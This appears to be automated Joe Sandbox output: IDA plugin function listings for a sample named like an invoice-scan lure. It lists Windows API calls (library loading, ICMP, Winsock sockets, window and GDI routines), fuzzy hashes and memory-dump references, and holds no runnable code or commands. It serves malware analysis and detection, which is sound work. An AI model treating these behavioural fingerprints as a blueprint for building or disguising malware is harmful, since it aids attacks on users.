                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: AllocTask_wcslen
                                                                              • String ID: hkG
                                                                              • API String ID: 2651040394-3610518997
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0043417A
                                                                              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0043418C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                              • API String ID: 2574300362-1816364905
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(ICMP.DLL,?,00434466,?,?,00464B68,?,?,?,00000000,?,?,00000101,?,?), ref: 004343DE
                                                                              • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004343F0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: ICMP.DLL$IcmpSendEcho
                                                                              • API String ID: 2574300362-58917771
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(ICMP.DLL,?,0043447D,?,?,00464B56,?,?,00000000,?,?,00000101,?,?), ref: 0043440D
                                                                              • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 0043441F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: ICMP.DLL$IcmpCloseHandle
                                                                              • API String ID: 2574300362-3530519716
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(ICMP.DLL,?,00434494,?,?,00464A94,?), ref: 0043443C
                                                                              • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 0043444E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: ICMP.DLL$IcmpCreateFile
                                                                              • API String ID: 2574300362-275556492
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,0040E551,?), ref: 0040EE7B
                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0040EE8D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: IsWow64Process$kernel32.dll
                                                                              • API String ID: 2574300362-3024904723
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: ClearVariant
                                                                              • String ID:
                                                                              • API String ID: 1473721057-0
                                                                              APIs
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                              • VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                              • VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                              • VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: CopyVariant$ErrorLast
                                                                              • String ID:
                                                                              • API String ID: 2286883814-0
                                                                              APIs
                                                                              • socket.WSOCK32(00000002,00000002,00000011), ref: 00474068
                                                                              • WSAGetLastError.WSOCK32(00000000,00000002,00000002,00000011), ref: 00474076
                                                                              • #21.WSOCK32 ref: 004740E0
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 004740EB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$socket
                                                                              • String ID:
                                                                              • API String ID: 1881357543-0
                                                                              APIs
                                                                              • ClientToScreen.USER32(00000000,?), ref: 00441CDE
                                                                              • GetWindowRect.USER32(?,?), ref: 00441D5A
                                                                              • PtInRect.USER32(?,?,?), ref: 00441D6F
                                                                              • MessageBeep.USER32(00000000), ref: 00441DF2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: Rect$BeepClientMessageScreenWindow
                                                                              • String ID:
                                                                              • API String ID: 1352109105-0
                                                                              • Opcode ID: f335056d542ece3fcaf1afd85692f97af485635a3f9ffa8235448c3f06d12885
                                                                              • Instruction ID: 11ad13a84751b34e4f8a983c71a6a29643224e7bbeba0240db3aabd8edeb2108
                                                                              • Opcode Fuzzy Hash: f335056d542ece3fcaf1afd85692f97af485635a3f9ffa8235448c3f06d12885
                                                                              • Instruction Fuzzy Hash: E64192B5A042418FE710DF18D884AABB7E5FFC9311F18866FE8518B360D734AC85CBA5
                                                                              APIs
                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0042387E
                                                                              • __isleadbyte_l.LIBCMT ref: 004238B2
                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,00000002,?,00000000,00000000,?,?,?,00000000,00000002,00000000), ref: 004238E3
                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,00000002,00000001,00000000,00000000,?,?,?,00000000,00000002,00000000), ref: 00423951
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                              • String ID:
                                                                              • API String ID: 3058430110-0
                                                                              • Opcode ID: f131ee11c0d220cb2dc6b3da44158834730645c68ebbd2a61d5b0c3ed448205f
                                                                              • Instruction ID: 550681b3841f0f34ee613cb5364b25607849a03987ccfca5eaaec14299199b49
                                                                              • Opcode Fuzzy Hash: f131ee11c0d220cb2dc6b3da44158834730645c68ebbd2a61d5b0c3ed448205f
                                                                              • Instruction Fuzzy Hash: A931C270B00265EFDB20EF64D8849AA7BF5EF01312B9445AAF0A09F291D338CE81CB55
                                                                              APIs
                                                                              • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D10A
                                                                              • GetLastError.KERNEL32(?,00000000), ref: 0045D12B
                                                                              • DeleteFileW.KERNEL32(00000000,?), ref: 0045D14C
                                                                              • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0045D16A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                                                              • String ID:
                                                                              • API String ID: 3321077145-0
                                                                              • Opcode ID: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
                                                                              • Instruction ID: 240381fd0e223f31e6bb83dc4f900fe278965bce5f9bbaa9f824fb1079ab41c9
                                                                              • Opcode Fuzzy Hash: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
                                                                              • Instruction Fuzzy Hash: 393180B5900301ABCB10AF71C985A1BF7E8AF84755F10891EF85497392C739FC45CB68
                                                                              APIs
                                                                              • GetParent.USER32(?), ref: 004505BF
                                                                              • DefDlgProcW.USER32(?,00000138,?,?,004A83D8,?,004A83D8,?), ref: 00450610
                                                                              • DefDlgProcW.USER32(?,00000133,?,?,004A83D8,?,004A83D8,?), ref: 0045065A
                                                                              • DefDlgProcW.USER32(?,00000134,?,?,004A83D8,?,004A83D8,?), ref: 00450688
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: Proc$Parent
                                                                              • String ID:
                                                                              • API String ID: 2351499541-0
                                                                              • Opcode ID: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
                                                                              • Instruction ID: e3e31f905615dd8bfbe674c7a91f48f64006a8638b4dc9b760805e547d05c650
                                                                              • Opcode Fuzzy Hash: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
                                                                              • Instruction Fuzzy Hash: 8C3128362411006BC2209B299C58DBB7B58EBC7336F14465BFA54832D3CB769826C768
                                                                              APIs
                                                                                • Part of subcall function 00438C85: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00438C95
                                                                                • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                              • SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 00461420
                                                                              • SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 0046144F
                                                                              • __itow.LIBCMT ref: 00461461
                                                                              • __itow.LIBCMT ref: 004614AB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: MessageSend$__itow$_wcslen
                                                                              • String ID:
                                                                              • API String ID: 2875217250-0
                                                                              • Opcode ID: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
                                                                              • Instruction ID: b65c482f8247f617b799fd724a7506577ebf884cdb52d0d4602b18db992df379
                                                                              • Opcode Fuzzy Hash: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
                                                                              • Instruction Fuzzy Hash: 3A213D7670031067D210BA169C86FAFB794EB94714F08443FFF44AB241EE69E94687EB
                                                                              APIs
                                                                              • GetForegroundWindow.USER32 ref: 00472806
                                                                                • Part of subcall function 00443EEF: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 00443F11
                                                                                • Part of subcall function 00443EEF: GetCurrentThreadId.KERNEL32 ref: 00443F18
                                                                                • Part of subcall function 00443EEF: AttachThreadInput.USER32(00000000), ref: 00443F1F
                                                                              • GetCaretPos.USER32(?), ref: 0047281A
                                                                              • ClientToScreen.USER32(00000000,?), ref: 00472856
                                                                              • GetForegroundWindow.USER32 ref: 0047285C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                              • String ID:
                                                                              • API String ID: 2759813231-0
                                                                              • Opcode ID: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
                                                                              • Instruction ID: 38f02bd9b1f6bed34cfa7ce2d7f69328ba3456287a0ba45db7850a86b8391dd2
                                                                              • Opcode Fuzzy Hash: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
                                                                              • Instruction Fuzzy Hash: FF2195716403056FE310EF65CC42F5BB7E8AF84708F144D2EF544AB282D6FAB9858795
                                                                              APIs
                                                                                • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0047728E
                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004772A9
                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004772C0
                                                                              • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001,?,?), ref: 004772D0
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: Window$Long$AttributesLayered
                                                                              • String ID:
                                                                              • API String ID: 2169480361-0
                                                                              • Opcode ID: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
                                                                              • Instruction ID: faea1ea985e506ac999786301d765d91882fdca708237d94abe4bce3661c65f1
                                                                              • Opcode Fuzzy Hash: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
                                                                              • Instruction Fuzzy Hash: 5F11B431205510ABD310FB29DD45F9BB798FF91720F10862EF455E72E2C7A8AC45C7A8
                                                                              APIs
                                                                              • SendMessageW.USER32 ref: 00448CB8
                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 00448CE0
                                                                              • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448D19
                                                                              • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D62
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: MessageSend$LongWindow
                                                                              • String ID:
                                                                              • API String ID: 312131281-0
                                                                              • Opcode ID: 75ae646de43e531ea10203f5aba75cb55710deee3f48b72b110124c921b55059
                                                                              • Instruction ID: 9d6bf2a2f0cb0d5184a29e15ea511504db1ac53b4253ca88fa0f688086887250
                                                                              • Opcode Fuzzy Hash: 75ae646de43e531ea10203f5aba75cb55710deee3f48b72b110124c921b55059
                                                                              • Instruction Fuzzy Hash: B12174715053019BF3208F18D98879FB7E4FBD5325F140B2EF594962D0DBB58449C796
                                                                              APIs
                                                                              • select.WSOCK32 ref: 0045890A
                                                                              • __WSAFDIsSet.WSOCK32(00000000,00000000), ref: 00458919
                                                                              • accept.WSOCK32(00000000,00000000,00000000), ref: 00458927
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00458952
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: ErrorLastacceptselect
                                                                              • String ID:
                                                                              • API String ID: 385091864-0
                                                                              • Opcode ID: abc1db9f2e63247cad6e2e0496bedee0f0acb9a353b4738024f17ecaf3b799d2
                                                                              • Instruction ID: 93f38c3b8a65fd8a68e5265ae944391143789c71a4918893f245a539b4228a7d
                                                                              • Opcode Fuzzy Hash: abc1db9f2e63247cad6e2e0496bedee0f0acb9a353b4738024f17ecaf3b799d2
                                                                              • Instruction Fuzzy Hash: 1F2166712043019BD314EF29C842BABB7E5AFC4714F144A2EF994DB2C1DBB4A985CB99
                                                                              APIs
                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00438D6F
                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D82
                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D9A
                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438DB4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID:
                                                                              • API String ID: 3850602802-0
                                                                              • Opcode ID: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
                                                                              • Instruction ID: 707762f1bc06eebb59e9357f9c77b20c0e090dcf7cedc03b298b4f863176c0ea
                                                                              • Opcode Fuzzy Hash: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
                                                                              • Instruction Fuzzy Hash: 77113AB6204305AFD210EF58DC84F6BF7E8EBE8750F20491EF580D7290D6B1A8468BA1
                                                                              APIs
                                                                              • CreateWindowExW.USER32(?,?,?,FFFFFFFF,?,?,?,?,?,?,00400000,00000000), ref: 0043367E
                                                                              • GetStockObject.GDI32(00000011), ref: 00433695
                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 0043369F
                                                                              • ShowWindow.USER32(00000000,00000000), ref: 004336BA
                                                                              Similarity
                                                                              • API ID: Window$CreateMessageObjectSendShowStock
                                                                              • String ID:
                                                                              • API String ID: 1358664141-0
                                                                              • Opcode ID: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
                                                                              • Instruction ID: 5bb77caae3378c1c36de35f78993aeb7f53e4fc0e9047450929301c31466c70f
                                                                              • Opcode Fuzzy Hash: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
                                                                              • Instruction Fuzzy Hash: 60114F72204A00BFD254DF55CC49F5BB3F9AFCCB01F20950DB254922A0D7B4E9418BA9
                                                                              APIs
                                                                              • GetCurrentThreadId.KERNEL32 ref: 004441B8
                                                                              • MessageBoxW.USER32(?,?,?,?), ref: 004441F6
                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0044420C
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00444213
                                                                              Similarity
                                                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                              • String ID:
                                                                              • API String ID: 2880819207-0
                                                                              • Opcode ID: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
                                                                              • Instruction ID: a177bb78e812b0c83f085b16f259857c8a511f23e32e5024349264f8b0df3d09
                                                                              • Opcode Fuzzy Hash: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
                                                                              • Instruction Fuzzy Hash: C401E5364183105BD300DB28ED08A9BBBD8BFD9721F18067EF89893351E6B48948C7B6
                                                                              APIs
                                                                              • GetWindowRect.USER32(?,?), ref: 00434037
                                                                              • ScreenToClient.USER32(?,?), ref: 0043405B
                                                                              • ScreenToClient.USER32(?,?), ref: 00434085
                                                                              • InvalidateRect.USER32(?,?,?), ref: 004340A4
                                                                              Similarity
                                                                              • API ID: ClientRectScreen$InvalidateWindow
                                                                              • String ID:
                                                                              • API String ID: 357397906-0
                                                                              • Opcode ID: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
                                                                              • Instruction ID: 02545dd0d615a745195cb6f618e51c1f9c2552a202a2369b8695847d2ce6fb2f
                                                                              • Opcode Fuzzy Hash: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
                                                                              • Instruction Fuzzy Hash: 24117EB9608302AFC304DF18D98095BBBE9FFD8650F10891EF88993350D770E9498BA2
                                                                              APIs
                                                                              Similarity
                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                              • String ID:
                                                                              • API String ID: 3016257755-0
                                                                              • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                              • Instruction ID: 11ead64bc5c18606fe5fffcedc2bbdf89ccfa4faa7bd693ca83be0ddd2add3a5
                                                                              • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                              • Instruction Fuzzy Hash: AA11A272500059BBCF225E85EC018EE3F66FB88354B898416FE2858131C73AC9B1AB85
                                                                              APIs
                                                                              • __wsplitpath.LIBCMT ref: 00436A45
                                                                                • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                              • __wsplitpath.LIBCMT ref: 00436A6C
                                                                              • __wcsicoll.LIBCMT ref: 00436A93
                                                                              • __wcsicoll.LIBCMT ref: 00436AB0
                                                                              Similarity
                                                                              • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                                              • String ID:
                                                                              • API String ID: 1187119602-0
                                                                              • Opcode ID: 5b78189461bd351535feab14c2aa3b28919a840a222a6c91b90152b853837e7b
                                                                              • Instruction ID: cc447ddabc085245cf6c6bda96777749177fc915bba42f20b5b260b799017f3a
                                                                              • Opcode Fuzzy Hash: 5b78189461bd351535feab14c2aa3b28919a840a222a6c91b90152b853837e7b
                                                                              • Instruction Fuzzy Hash: 690165B64043416BD724EB50D881EEBB3ED7BD8304F04C91EB5C982041FB38D24C87A6
                                                                              APIs
                                                                              Similarity
                                                                              • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                                              • String ID:
                                                                              • API String ID: 1597257046-0
                                                                              • Opcode ID: 3e6e4c0e3d6904c110b96eb61703f40a5b90c35020d8caf227267a531f68623b
                                                                              • Instruction ID: 9df5ee2dcc5f1a759a9cde70f7b42babd8a8bdcc369222b22224423102f690bd
                                                                              • Opcode Fuzzy Hash: 3e6e4c0e3d6904c110b96eb61703f40a5b90c35020d8caf227267a531f68623b
                                                                              • Instruction Fuzzy Hash: BFF06D32200200AFC314EB66C885E6BB3EAEBC5324F04852EF556C7791DB39F841C764
                                                                              APIs
                                                                              • DeleteObject.GDI32(?), ref: 0045564E
                                                                              • DeleteObject.GDI32(?), ref: 0045565C
                                                                              • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                              • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                              Similarity
                                                                              • API ID: DeleteDestroyObject$IconWindow
                                                                              • String ID:
                                                                              • API String ID: 3349847261-0
                                                                              • Opcode ID: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
                                                                              • Instruction ID: 3a9029eb8e47786e7dec82746d504bb216afab776d143f23dce7b1a7602128e4
                                                                              • Opcode Fuzzy Hash: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
                                                                              • Instruction Fuzzy Hash: 06F03C702006419BDB20AF65DDD8A2B77ACEF45322740456AFD04D7242DB28DC498B7D
                                                                              APIs
                                                                              • EnterCriticalSection.KERNEL32(?), ref: 0044B60B
                                                                              • InterlockedExchange.KERNEL32(?,?), ref: 0044B619
                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 0044B630
                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 0044B641
                                                                              Similarity
                                                                              • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                              • String ID:
                                                                              • API String ID: 2223660684-0
                                                                              • Opcode ID: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
                                                                              • Instruction ID: 8f2921e390180aa9c6083979f061463a0462abb68b72a76a452ff5fd2bc04521
                                                                              • Opcode Fuzzy Hash: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
                                                                              • Instruction Fuzzy Hash: 35F08C362422019F82249B59EA488DBB3FDEBE97213009C2FE142C32108BB5F806CB75
                                                                              APIs
                                                                                • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                              • MoveToEx.GDI32(?,?,00000000,00000000), ref: 0044728F
                                                                              • LineTo.GDI32(?,00000000,00000002), ref: 004472A0
                                                                              • EndPath.GDI32(?), ref: 004472B0
                                                                              • StrokePath.GDI32(?), ref: 004472BE
                                                                              Similarity
                                                                              • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                              • String ID:
                                                                              • API String ID: 2783949968-0
                                                                              • Opcode ID: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
                                                                              • Instruction ID: 15f667079dd022c0076d5117e5ffb33549464faf874781034dcdd6a9c0a79bb3
                                                                              • Opcode Fuzzy Hash: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
